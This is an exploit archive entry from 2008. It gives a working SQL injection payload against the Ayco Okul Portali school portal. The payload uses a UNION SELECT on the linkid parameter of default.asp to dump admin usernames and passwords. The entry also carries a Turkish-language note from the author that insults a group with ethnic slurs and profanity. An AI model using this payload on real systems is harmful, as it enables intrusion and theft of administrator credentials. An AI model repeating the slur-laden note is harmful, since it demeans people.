id: 3869
date: 10/09/2008
title: Ayco Okul Portali (linkid) SQL Injection Vulnerability (tr)
author: Crackers_Child
cves: 

===========================================================
Ayco Okul Portali (linkid) SQL Injection Vulnerability (tr)
===========================================================


**************************************************************************************

Author : By Crackers_Child
Note : Siz Pekeke Denen itler ; Siz ne turk ne de kurt olabilirsiniz. Siz Dupe Duz OROSPU cocuklarisiniz !

**************************************************************************************
Script   : Ayco Okul Portali (tr) Sql injection Vulnerability

http://www.aspindir.com/goster/5640

Price    : 100 ?

**************************************************************************************

Exploit : default.asp?tip=sollinkicerik&linkid=1+union+select+0,password,username,3+from+admin

**************************************************************************************




#  0day.today [2023-03-22]  #